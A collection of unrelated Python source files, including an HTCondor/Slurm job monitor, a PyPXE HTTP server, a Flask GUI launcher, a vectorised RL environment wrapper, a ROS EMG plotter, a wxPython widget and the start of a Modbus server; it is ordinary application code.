store_logs(logs=job_db[job_id]["log"], job_id=job_id)
job_db[job_id]["deleted"] = True
elif (
condor_job["JobStatus"] == condorJobStatus["Held"]
and int(condor_job["HoldReasonCode"]) not in ignore_hold_codes
):
logging.info("Job was held, will delete and set as failed")
self.job_manager_cls.stop(condor_job["ClusterId"])
job_db[job_id]["deleted"] = True
time.sleep(120)
except Exception as e:
logging.error("Unexpected error: {}".format(e), exc_info=True)
time.sleep(120)
slurmJobStatus = {
"failed": [
"BOOT_FAIL",
"CANCELLED",
"DEADLINE",
"FAILED",
"NODE_FAIL",
"OUT_OF_MEMORY",
"PREEMPTED",
"TIMEOUT",
"SUSPENDED",
"STOPPED",
],
"finished": ["COMPLETED"],
"running": ["CONFIGURING", "COMPLETING", "RUNNING", "STAGE_OUT"],
"idle": [
"PENDING",
"REQUEUE_FED",
"REQUEUE_HOLD",
"RESV_DEL_HOLD",
"REQUEUED",
"RESIZING",
]
# 'REVOKED',
# 'SIGNALING',
# 'SPECIAL_EXIT',
}
@singleton
class JobMonitorSlurmCERN(JobMonitor):
"""Slurm jobs monitor CERN."""
def __init__(self, **kwargs):
"""Initialize Slurm job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["slurmcern"]()
super(__class__, self).__init__(thread_name="slurm_job_monitor")
def watch_jobs(self, job_db, app=None):
"""Use SSH connection to slurm submitnode to monitor jobs.
:param job_db: Dictionary which contains all running jobs.
"""
slurm_connection = SSHClient(
hostname=self.job_manager_cls.SLURM_HEADNODE_HOSTNAME,
port=self.job_manager_cls.SLURM_HEADNODE_PORT,
)
statuses_to_skip = ["finished", "failed"]
while True:
logging.debug("Starting a new stream request to watch Jobs")
try:
slurm_jobs = {}
for id, job_dict in job_db.items():
if (
not job_db[id]["deleted"]
and job_db[id]["compute_backend"] == "slurmcern"
and not job_db[id]["status"] in statuses_to_skip
):
slurm_jobs[job_dict["backend_job_id"]] = id
if not slurm_jobs.keys():
continue
for slurm_job_id, job_dict in slurm_jobs.items():
slurm_job_status = slurm_connection.exec_command(
f"scontrol show job {slurm_job_id} -o | tr ' ' '\n' | grep JobState | cut -f2 -d '='"
).rstrip()
job_id = slurm_jobs[slurm_job_id]
if slurm_job_status in slurmJobStatus["finished"]:
self.job_manager_cls.get_outputs()
job_db[job_id]["status"] = "finished"
job_db[job_id]["deleted"] = True
job_db[job_id]["log"] = self.job_manager_cls.get_logs(
backend_job_id=slurm_job_id,
workspace=job_db[job_id]["obj"].workflow_workspace,
)
store_logs(logs=job_db[job_id]["log"], job_id=job_id)
if slurm_job_status in slurmJobStatus["failed"]:
self.job_manager_cls.get_outputs()
job_db[job_id]["status"] = "failed"
job_db[job_id]["deleted"] = True
job_db[job_id]["log"] = self.job_manager_cls.get_logs(
backend_job_id=slurm_job_id,
workspace=job_db[job_id]["obj"].workflow_workspace,
)
store_logs(logs=job_db[job_id]["log"], job_id=job_id)
except Exception as e:
logging.error("Unexpected error: {}".format(e), exc_info=True)
time.sleep(120)
def store_logs(logs, job_id):
"""Write logs to DB."""
try:
logging.info("Storing job logs: {}".format(job_id))
Session.query(Job).filter_by(id_=job_id).update(dict(logs=logs))
Session.commit()
except Exception as e:
logging.error("Exception while saving logs: {}".format(str(e)), exc_info=True)
def format_condor_job_que_query(backend_job_ids):
"""Format HTCondor job que query."""
base_query = "ClusterId == {} ||"
query = ""
for job_id in backend_job_ids:
query += base_query.format(job_id)
return query[:-2]
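# Illustrative note (not part of the original module): for backend_job_ids = [101, 102]
# the builder above returns the string
#   "ClusterId == 101 ||ClusterId == 102 "
# i.e. ClusterId clauses joined by "||", with the final separator trimmed by query[:-2].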
def query_condor_jobs(app, backend_job_ids):
"""Query condor jobs."""
ads = ["ClusterId", "JobStatus", "ExitCode", "ExitStatus", "HoldReasonCode"]
query = format_condor_job_que_query(backend_job_ids)
htcondorcern_job_manager_cls = COMPUTE_BACKENDS["htcondorcern"]()
schedd = htcondorcern_job_manager_cls._get_schedd()
logging.info("Querying jobs {}".format(backend_job_ids))
condor_jobs = schedd.xquery(requirements=query, projection=ads)
return condor_jobs
|
http.py
|
'''
This file contains classes and functions that implement the PyPXE HTTP service
'''
import socket
import struct
import os
import threading
import logging
from pypxe import helpers
class HTTPD:
'''
This class implements a HTTP Server, limited to GET and HEAD,
from RFC2616, RFC7230.
'''
def __init__(self, **server_settings):
self.ip = server_settings.get('ip', '0.0.0.0')
self.port = int(server_settings.get('port', 80))
self.netboot_directory = server_settings.get('netboot_directory', '.')
self.mode_verbose = server_settings.get('mode_verbose', False) # verbose mode
self.mode_debug = server_settings.get('mode_debug', False) # debug mode
self.logger = server_settings.get('logger', None)
# setup logger
if self.logger == None:
self.logger = logging.getLogger('HTTP')
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if self.mode_debug:
self.logger.setLevel(logging.DEBUG)
elif self.mode_verbose:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.WARN)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.ip, self.port))
self.sock.listen(1)
self.logger.debug('NOTICE: HTTP server started in debug mode. HTTP server is using the following:')
self.logger.info('Server IP: {0}'.format(self.ip))
self.logger.info('Server Port: {0}'.format(self.port))
self.logger.info('Network Boot Directory: {0}'.format(self.netboot_directory))
def handle_request(self, connection, addr):
'''This method handles HTTP request.'''
request = connection.recv(1024)
        self.logger.debug('Received message from {addr}'.format(addr = repr(addr)))
self.logger.debug('<--BEGIN MESSAGE-->')
self.logger.debug('{0}'.format(repr(request)))
self.logger.debug('<--END MESSAGE-->')
method, target, version = request.decode('ascii').split('\r\n')[0].split(' ')
target = target.lstrip('/')
try:
self.logger.debug("Netboot: {0}, Target: {1}".format(self.netboot_directory, target))
target = helpers.normalize_path(self.netboot_directory, target)
if not os.path.lexists(target) or not os.path.isfile(target):
status = '404 Not Found'
elif method not in ('GET', 'HEAD'):
status = '501 Not Implemented'
else:
status = '200 OK'
except helpers.PathTraversalException:
status = '403 Forbidden'
response = 'HTTP/1.1 {0}\r\n'.format(status)
if status[:3] != '200': # fail out
connection.send(response.encode('ascii'))
connection.close()
self.logger.warn('Sending {status} to {addr[0]}:{addr[1]} for {target}'.format(status = status, target = target, addr = addr))
self.logger.debug('Sending message to {0}'.format(repr(addr)))
            self.logger.debug('<--BEGIN MESSAGE-->')
self.logger.debug('{0}'.format(repr(response)))
self.logger.debug('<--END MESSAGE-->')
return
response += 'Content-Length: {0}\r\n'.format(os.path.getsize(target))
response += '\r\n'
if method == 'HEAD':
            connection.send(response.encode('ascii'))
connection.close()
self.logger.debug('Sending message to {0}'.format(repr(addr)))
            self.logger.debug('<--BEGIN MESSAGE-->')
self.logger.debug('{0}'.format(repr(response)))
self.logger.debug('<--END MESSAGE-->')
return
connection.send(response.encode('ascii'))
with open(target, 'rb') as handle:
while True:
data = handle.read(8192)
if not data: break
connection.send(data)
connection.close()
self.logger.info('File Sent - {target} -> {addr[0]}:{addr[1]}'.format(target = target, addr = addr))
def listen(self):
'''This method is the main loop that listens for requests.'''
while True:
conn, addr = self.sock.accept()
client = threading.Thread(target = self.handle_request, args = (conn, addr))
client.daemon = True;
client.start()
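
# Minimal usage sketch (illustrative, not part of the original module): run the HTTP
# service standalone instead of through the PyPXE launcher. The port and directory
# below are arbitrary example values.
if __name__ == '__main__':
    httpd = HTTPD(ip='0.0.0.0', port=8080, netboot_directory='.', mode_verbose=True)
    httpd.listen()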
|
server.py
|
# -*- coding: utf-8 -*-
""" Flask app for the graphical user interface.
"""
from __future__ import print_function, division, unicode_literals
import threading
import socket
import time
import sys
import os
from base64 import urlsafe_b64encode
try:
from http.client import HTTPConnection
except ImportError:
from httplib import HTTPConnection
import logging
try:
import webview
PYWEBVIEW_AVAILABLE = True
except:
PYWEBVIEW_AVAILABLE = False
try:
from flask import Flask, Blueprint, url_for, render_template, jsonify, request, make_response
app_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), 'app')
static_path = os.path.join(app_path, 'static')
server = Blueprint('polevault', __name__, static_folder=static_path, template_folder=app_path)
FLASK_AVAILABLE = True
except:
FLASK_AVAILABLE = False
# import webbrowser
cancel_heavy_stuff_flag = False
@server.after_request
def add_header(response):
response.headers['Cache-Control'] = 'no-store'
return response
@server.route("/")
def landing():
"""
Render index.html. Initialization is performed asynchronously in initialize() function
"""
return render_template("index.html")
@server.route("/choose/path")
def choose_path():
"""
Invoke a folder selection dialog here
:return:
"""
current_directory = os.getcwd()
dirs = webview.create_file_dialog(webview.FOLDER_DIALOG,
directory=current_directory)
if dirs and len(dirs) > 0:
directory = dirs[0]
if isinstance(directory, bytes):
directory = directory.decode("utf-8")
if directory.startswith(current_directory + os.path.sep):
directory = directory[len(current_directory) + len(os.path.sep):]
response = {"message": directory}
else:
response = {"message": "cancel"}
return jsonify(response)
@server.route("/fullscreen")
def fullscreen():
webview.toggle_fullscreen()
return jsonify({})
# @server.route("/open-url", methods=["POST"])
# def open_url():
# url = request.json["url"]
# webbrowser.open_new_tab(url)
# return jsonify({})
@server.route("/python_version")
def python_version():
return jsonify({
'message': 'Hello from Python {0}'.format(sys.version)
})
@server.route("/heavy_stuff/do")
def do_stuff():
    time.sleep(0.1)  # sleep to prevent the UI thread from freezing for a moment
now = time.time()
global cancel_heavy_stuff_flag
cancel_heavy_stuff_flag = False
response = {
'message': 'starting stuff'
}
for i in range(0, 200000):
_ = urlsafe_b64encode(os.urandom(80)).decode('utf-8')
if cancel_heavy_stuff_flag:
response = {'message': 'Operation cancelled'}
break
else:
then = time.time()
response = {
'message': 'Operation took {0:.1f} seconds on the thread {1}'.format((then - now), threading.current_thread())
}
return jsonify(response)
@server.route("/heavy_stuff/cancel")
def cancel_stuff():
time.sleep(0.1)
global cancel_heavy_stuff_flag
cancel_heavy_stuff_flag = True
response = {
'message': 'canceling stuff'
}
return jsonify(response)
@server.route("/close_down")
def close_down():
response = {
'message': 'closing'
}
webview.destroy_window()
os._exit(0)
return jsonify(response)
def run_server(port, prefix):
app = Flask(__name__)
app.register_blueprint(server, url_prefix=prefix)
app.config["SEND_FILE_MAX_AGE_DEFAULT"] = 1 # disable caching
logger = logging.getLogger('werkzeug')
logger.setLevel(logging.ERROR)
logger.disabled = True
app.logger.disabled = True
so = sys.stdout
se = sys.stderr
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
app.run(host="127.0.0.1", port=port, threaded=True)
sys.stdout = so
sys.stderr = se
def url_ok(host, port, prefix):
try:
conn = HTTPConnection(host, port)
conn.request("GET", prefix)
r = conn.getresponse()
return r.status == 200
except:
return False
def find_free_port(start=5000, end=5999):
found = False
for port in range(start, end):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(('127.0.0.1', port)) != 0:
found = True
if found:
return port
return 0
def gui():
port = find_free_port()
if port > 0 and PYWEBVIEW_AVAILABLE and FLASK_AVAILABLE:
prefix = '/' + urlsafe_b64encode(os.urandom(33)).decode('utf8').rstrip('=') + '/'
t = threading.Thread(target=run_server, args=(port, prefix))
t.daemon = True
t.start()
# print("http://127.0.0.1:{}{}".format(port, prefix))
while not url_ok('127.0.0.1', port, prefix):
time.sleep(0.1)
webview.create_window('Pole Vault',
"http://127.0.0.1:{}{}".format(port, prefix),
confirm_quit=True,
)
else:
if not FLASK_AVAILABLE:
print('''
You must install the flask package in order to
use the graphical user interface:
pip install flask
''')
if not PYWEBVIEW_AVAILABLE:
print('''
You must install the pywebview package in order to
use the graphical user interface:
pip install pywebview
''')
print('''
For help about using polevault from the CLI please type:
polevault --help
''')
exit(3)
if __name__ == "__main__":
port = find_free_port()
if port > 0 and PYWEBVIEW_AVAILABLE and FLASK_AVAILABLE:
prefix = '/prefix/'
print("http://127.0.0.1:{}{}".format(port, prefix))
run_server(port, prefix)
|
subproc_vec_env.py
|
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset() for env in envs])
elif cmd == 'get_avail_actions':
remote.send([env.get_avail_actions() for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
elif cmd == 'seed':
new_seed = data
envs[0].seed(new_seed)
remote.send(envs[0].reset())
elif cmd == 'level_seed':
remote.send(envs[0].level_seed)
elif cmd == 'observe':
remote.send(envs[0].observation(envs[0].gen_obs()))
else:
print(f'Not implemented {cmd} {data}')
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
    VecEnv that runs multiple environments in parallel in subprocesses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv().x
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def get_avail_actions(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('get_avail_actions', None))
avail_act = [pipe.recv() for pipe in self.remotes]
avail_act = _flatten_list(avail_act)
return avail_act
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
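
# Minimal usage sketch (illustrative, not part of the original module). Assumes gym is
# installed, provides 'CartPole-v1', and uses the classic 4-tuple step API; the
# __main__ guard is required because the default multiprocessing context is 'spawn'.
if __name__ == '__main__':
    import gym
    venv = SubprocVecEnv([lambda: gym.make('CartPole-v1') for _ in range(4)])
    obs = venv.reset()
    actions = [venv.action_space.sample() for _ in range(venv.num_envs)]
    obs, rewards, dones, infos = venv.step(actions)
    print(rewards)
    venv.close()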
|
plot_emg2.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import rospy
from ros_myo.msg import EmgArray
import matplotlib.pyplot as plt
import threading as th
from copy import deepcopy
class EmgSubscriber():
def __init__(self):
n_ch = 8
self.RP = realtime_plot(n_ch)
self.subscriber = rospy.Subscriber("/myo_raw/myo_emg", EmgArray, self.callback)
self.Emgs = np.zeros((8, 200))
        self.th1 = th.Thread(target=self.RP.pause, args=(4./200.,))  # pass the callable and its argument; calling pause() here would block __init__ forever
self.th1.start()
def callback(self, msg):
get_emg = msg.data
for i in range(len(get_emg)):
buf = np.delete(self.Emgs[i], -1)
self.Emgs[i] = np.insert(buf, 0, get_emg[i])
self.RP.set_data(self.Emgs)
class realtime_plot(object):
def __init__(self, num):
self.fig = plt.figure(figsize=(15, 15))
self.n_ch = num
self.initialize()
def initialize(self):
self.fig.suptitle('EMG', size=15)
plt.subplots_adjust(wspace=0.4, hspace=1.0)
t = np.arange(4, 0., -4./200.)
self.axs = [plt.subplot2grid((self.n_ch, 1),(i,0)) for i in range(self.n_ch)]
self.lines = [None for i in range(self.n_ch)]
for i in range(self.n_ch):
self.axs[i].grid(True)
self.axs[i].set_title("ch{}".format(i+1))
self.axs[i].set_ylim((0, 1100))
self.axs[i].set_xlim((t.min(), t.max()))
self.lines[i], = self.axs[i].plot([-1, 1], [1, 1])
def set_data(self, data):
t = np.arange(4, 0., -4./200.)
for i in range(self.n_ch):
self.lines[i].set_data(t, data[i])
def pause(self,second):
while(True):
# self.t += 4./200.
plt.pause(second)
if __name__ == "__main__":
rospy.init_node("plots_emg")
sub = EmgSubscriber()
rospy.spin()
|
number_field.py
|
# ----------------------------------------------------------------------------
# GS Widget Kit Copyright 2021 by Noah Rahm and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import wx
from wx.lib.newevent import NewCommandEvent
import threading
from .textctrl import TextCtrl
numberfield_cmd_event, EVT_NUMBERFIELD = NewCommandEvent()
numberfield_change_cmd_event, EVT_NUMBERFIELD_CHANGE = NewCommandEvent()
def GetTextExtent(text):
tdc = wx.WindowDC(wx.GetApp().GetTopWindow())
w, h = tdc.GetTextExtent(text)
return w, h
class NumberField(wx.Control):
def __init__(self, parent, _id=wx.ID_ANY, label="", default_value=0, min_value=0,
max_value=10, suffix="px", show_p=True, scroll_horz=True, size=wx.DefaultSize):
wx.Control.__init__(self, parent, _id, pos=wx.DefaultPosition,
size=size, style=wx.NO_BORDER)
self.parent = parent
self.focused = False
self.mouse_in = False
self.control_size = wx.DefaultSize
self.show_p = show_p
self.buffer = None
self.dragging = False
if scroll_horz is True:
self.scroll_dir = 0
else:
self.scroll_dir = 1
self.cur_value = default_value
self.min_value = min_value
self.max_value = max_value
self.change_rate = .5
self.change_value = 0
self.suffix = suffix
self.value_range = [i for i in range(min_value, max_value)]
self.label = label
self.padding_x = 20
self.padding_y = 10
# Flag that is true if a drag is happening after a left click
self.changing_value = False
# Keep track of last sent event
self.last_sent_event = None
# The point in which the cursor gets anchored to during the drag event
self.anchor_point = (0, 0)
# Text ctrl
self.textctrl = TextCtrl(self, value=str(self.cur_value),
style=wx.BORDER_NONE, pos=(0, 0),
size=(10, 24))
self.textctrl.Hide()
self.textctrl.Bind(wx.EVT_LEAVE_WINDOW, self.OnHideTextCtrl)
self.textctrl.Bind(wx.EVT_KILL_FOCUS, self.OnHideTextCtrl)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
self.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown, self)
self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp, self)
self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)
self.Bind(wx.EVT_LEAVE_WINDOW, self.OnMouseLeave)
self.Bind(wx.EVT_ENTER_WINDOW, self.OnMouseEnter)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnShowTextCtrl)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnPaint(self, event):
wx.BufferedPaintDC(self, self.buffer)
def OnSize(self, event):
size = self.GetClientSize()
# Make sure size is at least 1px to avoid
# strange "invalid bitmap size" errors.
if size[0] < 1:
size = (1, 1)
self.buffer = wx.Bitmap(*size)
self.UpdateDrawing()
def UpdateDrawing(self):
dc = wx.MemoryDC()
dc.SelectObject(self.buffer)
dc = wx.GCDC(dc)
self.OnDrawBackground(dc)
self.OnDrawWidget(dc)
del dc # need to get rid of the MemoryDC before Update() is called.
self.Refresh()
self.Update()
def OnDrawBackground(self, dc):
dc.SetBackground(wx.Brush(self.parent.GetBackgroundColour()))
dc.Clear()
def OnDrawWidget(self, dc):
fnt = self.parent.GetFont()
dc.SetFont(fnt)
dc.SetPen(wx.TRANSPARENT_PEN)
full_val_lbl = str(self.cur_value)+self.suffix
width = self.Size[0]
height = self.Size[1]
one_val = width / self.max_value
self.p_val = round((self.cur_value*one_val))
if self.mouse_in:
dc.SetTextForeground("#ffffff")
dc.SetBrush(wx.Brush(wx.Colour("#4c4c4c")))
else:
dc.SetTextForeground("#e9e9e9")
dc.SetBrush(wx.Brush(wx.Colour("#333333")))
dc.DrawRoundedRectangle(0, 0, width, height, 4)
if self.show_p is True:
dc.SetBrush(wx.Brush(wx.Colour("#5680C2")))
dc.DrawRoundedRectangle(0, 0, self.p_val, height, 4)
if self.p_val < width-4 and self.p_val > 4:
dc.DrawRectangle((self.p_val)-4, 0, 4, height)
lbl_w, lbl_h = GetTextExtent(self.label)
val_w, val_h = GetTextExtent(full_val_lbl)
dc.DrawText(self.label, self.padding_x, int((height/2) - (lbl_h/2)))
dc.DrawText(full_val_lbl, (width-self.padding_x) - (val_w), int((height/2) - (val_h/2)))
# Update position of textctrl
self.textctrl.SetPosition((5, (int(self.Size[1]/2) - 10)))
self.textctrl.SetSize((int(self.Size[0]-10), 24))
self.textctrl.SetCurrentPos(len(str(self.cur_value)))
def updateDelta(self,event):
# Calculate the change in mouse position
cur_point = event.GetPosition()
self.delta = cur_point[self.scroll_dir] - self.anchor_point[self.scroll_dir]
def updateDragging(self,event):
self.dragging = event.Dragging()
def OnMouseMotion(self, event):
"""
        When the mouse moves, this checks whether a drag is in progress or whether a
        left-down has happened. If neither case is true, the action is cancelled.
        If both are true, it calculates the change in mouse position, then moves the
        cursor back to where the left-click event happened.
"""
# Changes the cursor
if self.changing_value:
T1 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_BLANK),))
else:
T1 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_SIZEWE),))
T2 = threading.Thread(target=self.updateDelta,args=(event,))
T3 = threading.Thread(target=self.updateDragging,args=(event,))
T1.start()
T2.start()
T3.start()
T2.join()
T1.join()
T3.join()
# If the cursor is being moved and dragged left or right
if self.delta != 0 and self.dragging and self.changing_value:
#T4 = threading.Thread(target=self.UpdateWidget)
self.UpdateWidget()
#T5 = threading.Thread(target=self.UpdateDrawing)
self.UpdateDrawing()
if self.dragging and self.changing_value:
T4 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_BLANK),))
""" I removed this part because it was causing a bug
# Set the cursor back to the original point so it doesn't run away
#T5 = threading.Thread(target=self.WarpPointer,args=(int(self.anchor_point[0]), int(self.anchor_point[1])))"""
# Case where the mouse is moving over the control, but has no
# intent to actually change the value
if self.changing_value and not self.dragging:
self.changing_value = False
T4 = threading.Thread(target=self.parent.SetDoubleBuffered,args=(False,))
T4.start()
T4.join()
del(T4)
del(T1,T2,T3)
def OnHideTextCtrl(self, event):
value = self.textctrl.GetValue()
if value != " ":
new_value = int(value)
if new_value in [i for i in range(0, self.max_value+1)]:
if new_value >= self.min_value and new_value <= self.max_value:
self.cur_value = new_value
self.textctrl.Hide()
self.SendChangeEvent()
self.SendSliderEvent()
self.UpdateDrawing()
def OnShowTextCtrl(self, event):
if self.show_p is False:
self.textctrl.Show()
self.textctrl.SetFocus()
def SendSliderEvent(self):
wx.PostEvent(self, numberfield_cmd_event(id=self.GetId(), value=self.cur_value))
def SendChangeEvent(self):
# Implement a debounce system where only one event is
# sent only if the value actually changed.
if self.cur_value != self.last_sent_event:
wx.PostEvent(self, numberfield_change_cmd_event(
id=self.GetId(), value=self.cur_value))
self.last_sent_event = self.cur_value
def Increasing(self):
if self.delta > 0:
return True
else:
return False
def Decreasing(self):
if self.delta < 0:
return True
else:
return False
def OnLeftUp(self, event):
"""
Cancels the changing event, and turns off the optimization buffering
"""
self.changing_value = False
self.parent.SetDoubleBuffered(False)
self.SetCursor(wx.Cursor(wx.CURSOR_SIZEWE))
self.SendSliderEvent()
def OnLeftDown(self, event):
"""
        Sets the anchor point that the cursor will be returned to.
        Also turns on double buffering, which eliminates the flickering when rapidly changing values.
"""
pos = event.GetPosition()
self.anchor_point = (pos[0], pos[1])
self.changing_value = True
self.parent.SetDoubleBuffered(True)
self.UpdateDrawing()
def OnSetFocus(self, event):
self.focused = True
self.Refresh()
def OnKillFocus(self, event):
self.focused = False
self.Refresh()
def OnMouseEnter(self, event):
self.mouse_in = True
self.Refresh()
self.UpdateDrawing()
def OnMouseLeave(self, event):
"""
In the event that the mouse is moved fast enough to leave the bounds of the label, this
will be triggered, warping the cursor back to where the left click event originally
happened
"""
if self.changing_value:
self.WarpPointer(self.anchor_point[0], self.anchor_point[1])
self.mouse_in = False
self.Refresh()
self.UpdateDrawing()
def AcceptsFocusFromKeyboard(self):
"""Overridden base class virtual."""
return True
def AcceptsFocus(self):
""" Overridden base class virtual. """
return True
def HasFocus(self):
""" Returns whether or not we have the focus. """
return self.focused
def GetValue(self):
return self.cur_value
def SetValue(self, value):
self.cur_value = value
def SetLabel(self, label):
self.label = label
def UpdateWidget(self):
self.change_value += self.change_rate/2.0
if self.change_value >= 1:
if self.Increasing():
if self.cur_value < self.max_value:
self.cur_value += 1
else:
if (self.cur_value - 1) >= 0:
if self.cur_value > self.min_value:
self.cur_value -= 1
# Reset the change value since the value was just changed.
self.change_value = 0
self.SendChangeEvent()
def DoGetBestSize(self):
"""
Overridden base class virtual. Determines the best size of the control
based on the label size, the bitmap size and the current font.
"""
normal_label = self.label
value_label = str(self.cur_value)+self.suffix
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc = wx.ClientDC(self)
dc.SetFont(font)
# Measure our labels
lbl_text_w, lbl_text_h = dc.GetTextExtent(normal_label)
val_text_w, val_text_h = dc.GetTextExtent(value_label)
totalwidth = lbl_text_w + val_text_w + self.padding_x + 76
# To avoid issues with drawing the control properly, we
# always make sure the width is an even number.
if totalwidth % 2:
totalwidth -= 1
totalheight = lbl_text_h + self.padding_y
best = wx.Size(totalwidth, totalheight)
# Cache the best size so it doesn't need to be calculated again,
# at least until some properties of the window change
self.CacheBestSize(best)
return best
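
# Minimal usage sketch (illustrative, not part of the original module). Run it as a
# module inside the containing package (e.g. `python -m <package>.number_field`) so the
# relative TextCtrl import resolves; the label and value range are arbitrary examples.
if __name__ == '__main__':
    app = wx.App(False)
    frame = wx.Frame(None, title="NumberField demo", size=(320, 120))
    panel = wx.Panel(frame)
    field = NumberField(panel, label="Radius", default_value=5, min_value=0,
                        max_value=100, suffix="px", size=(260, 32))
    field.Bind(EVT_NUMBERFIELD_CHANGE, lambda evt: print(evt.value))
    frame.Show()
    app.MainLoop()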
|
modbus_server.py
|
#!/usr/bin/env python
# modbus_server.py
# Copyright (C) 2017 Niryo
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rospy
from threading import Thread
from pymodbus.server.sync import ModbusTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from niryo_one_modbus.coil_data_block import CoilDataBlock
from niryo_one_modbus.discrete_input_data_block import DiscreteInputDataBlock
from niryo_one_modbus.input_register_data_block import InputRegisterDataBlock
from niryo_one_modbus.holding_register_data_block import HoldingRegisterDataBlock
class ModbusServer:
def __init__(self, address, port):
self.coil = CoilDataBlock()
self.discrete_input = DiscreteInputDataBlock()
self.input_register = InputRegisterDataBlock()
self.holding_register = HoldingRegisterDataBlock()
self.store = ModbusSlaveContext(di=self.discrete_input,
co=self.coil, hr=self.holding_register, ir=self.input_register)
